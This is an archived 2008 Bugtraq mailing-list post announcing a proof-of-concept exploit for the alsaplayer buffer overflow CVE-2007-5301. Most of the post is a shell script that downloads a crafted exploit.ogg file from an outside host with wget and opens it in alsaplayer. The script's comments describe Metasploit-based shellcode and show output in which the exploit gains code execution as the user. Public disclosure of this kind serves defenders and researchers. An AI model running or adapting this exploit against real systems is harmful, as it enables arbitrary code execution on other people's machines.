lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-Id: <1207765443.8052.15.camel@x61s.wekk.net>
Date: Wed, 09 Apr 2008 20:24:03 +0200
From: Albert Sellarès <whats@...k.net>
To: bugtraq@...urityfocus.com
Subject: [CVE-2007-5301] alsaplayer PoC - exploit

Hello,

I have released this PoC for the alsaplayer bug CVE-2007-5301.

You can find all the needed files at http://www.wekk.net/research/CVE-2007-5301/

#!/bin/sh
#
# http://www.wekk.net/research/CVE-2007-5301/CVE-2007-5301-exploit.sh
#
# Exploit for alsaplayer before 0.99.80-rc3. Tested with the debian etch package 
# alsaplayer-common at version 0.99.76-9
#
# CVE-2007-5301 / DSA-1538
# 
# by Albert Sellarès <whats[at]wekk[dot]net> - http://www.wekk.net
# 2008-04-09
#
# Shellcode is based on metasploit framework. If you want to test it in other 
# systems, maybe you have to recalculate offsets.
#
# Example:
# 
# whats@...ian:~$ ./CVE-2007-5301-exploit.sh
# Alsaplayer buffer overflow < 0.99.80-rc3
# by Albert Sellarès <whats[at]wekk[dot]net> - http://www.wekk.net
#
#
# --12:19:27--  http://www.wekk.net/research/CVE-2007-5301/exploit.ogg
#            => `exploit.ogg'
# Resolving www.wekk.net... 64.22.71.90
# Connecting to www.wekk.net|64.22.71.90|:80... connected.
# HTTP request sent, awaiting response... 200 OK
# Length: 5,421 (5.3K) [application/ogg]
# 
# 100%[===============================================================================>] 5,421 
# 12:19:28 (37.00 KB/s) - `exploit.ogg' saved [5421/5421]
# uid=1000(whats) gid=1000(whats) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(whats)
#

echo -e "Alsaplayer buffer overflow < 0.99.80-rc3"
echo -e "by Albert Sellarès <whats[at]wekk[dot]net> - http://www.wekk.net\n\n"
wget http://www.wekk.net/research/CVE-2007-5301/exploit.ogg
alsaplayer exploit.ogg



-- 
  Albert Sellarès        GPG id: 0x13053FFE
  http://www.wekk.net    whats_up@...ber.org 
  Membre de Catux.org    http://catux.org    
  Linux User: 324456     Catalunya           


Download attachment "signature.asc" of type "application/pgp-signature" (190 bytes)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ